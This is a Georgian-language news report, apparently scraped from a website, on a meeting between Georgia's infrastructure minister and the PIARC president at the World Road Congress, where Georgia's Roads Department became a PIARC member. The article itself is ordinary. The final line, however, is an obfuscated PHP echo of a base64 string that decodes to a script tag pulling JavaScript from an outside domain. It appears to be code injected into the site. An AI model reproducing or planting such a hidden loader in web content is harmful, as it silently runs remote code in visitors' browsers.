celsiusi
ავერსი შნაიდერი

საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრმა, ირაკლი ქარსელაძემ, მსოფლიო საგზაო კონგრესის ფარგლებში, მსოფლიო საგზაო ასოციაციის (PIARC) პრეზიდენტ ნაზირ ალისთან ორმხრივი შეხვედრა გამართა.

კონგრესის ფარგლებში რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს საავტომობილო გზების დეპარტამენტი მსოფლიოს საგზაო ასოციაციის წევრი გახდა, - ამის შესახებ საინფორმაციო სააგენტო "ბიზნესთაიმს" ინფრასტრუქტურის სამინისტროდან აცნობეს. 
 
შეხვედრის მხარეებმა ისაუბრეს საქართველოზე გამავალი საერთაშორისო მაგისტრალების განვითარების მიმდინარეობაზე და პროგრესზე. მინისტრმა ასოციაციის პრეზიდენტს გააცნო საგზაო ინფრასტრუქტურის განვითარებისთვის ქვეყანის მოკლევადიანი და გრძელვადიანი გეგმები და ამ გეგმების შესაბამისად მიმდინარე პროექტები, რასაც ნაზირ ალიმ მაღალი შეფასება მისცა.
 
შეხვედრის მხარეებმა აღნიშნეს საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს საავტომობილო გზების დეპარტამენტის გაწევრიანების მნიშვნელობა მსოფლიო საგზაო ასოციაციაში (PIARC). ასევე, დეპარტამენტსა და ასოციაციას შორის ურთიერთობების გააქტიურების შესაძლებლობები.
 
,,ძალიან საინტერესოდ მიმდინარეობს 27-ე მსოფლიო საგზაო კონგრესი,რომლის ფარგლებშიც მოვისმინეთ მოხსენებები მრავალი მიმართულებით. აღსანიშნავია რომ დღეს გვქონდა ძალიან პროდუქტიული შეხვედრა მსოფლიო საგზაო ასოციაციის პრეზიდენტთან, რომლის ფარგლებშიც საქართველო უკვე გახდა ამ ასოციაციის წევრი.
 
ასოციაცია 100 წელზე მეტ ისტორიას ატარებს და ამ პერიოდის განმავლობაში ძალიან მნიშვნელოვანი წვლილი აქვს შეტანილი საგზაო დარგის ტექნოლოგიების, ინჟინერიის და მრავალი სხვა საგზაო მიმართულების განვითარებაში. დღეიდან საქართველო, რომელიც წარმოდგენილი იქნება რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს საგზაო დეპარტამენტის სახით აქტიურად ჩაერევა ასოციაციის კომიტეტების და სხვადასხვა მიმართულების სამუშაოებში“-განაცხადა ირაკლი ქარსელაძემ.
 
,, დღეს გავხდით მსოფლიო საგზაო ასოციაციის 126- წევრი გავხდით რაც მოგვცემს ახალ შესაძლებლობებეს გავიზიაროთ სხვადასხვა ქვეყნის გამოცდილება და დავნერგოთ ჩვენს ქვეყანაში საგზაო ინფრასტრუქტურის განვითარების კუთხით“-აღნიშნა საავტომობილო გზების დეპარტამენტის დეპარტამენტის თავმჯდომარემ გიორგი წერეთელმა.
 
შეხვედრას ესწრებოდნენ საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს საავტომობილო გზების დეპარტამენტის თავმჯდომარე გიორგი წერეთელი და მისი მოადგილე სალომე წურწუმია.

547
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");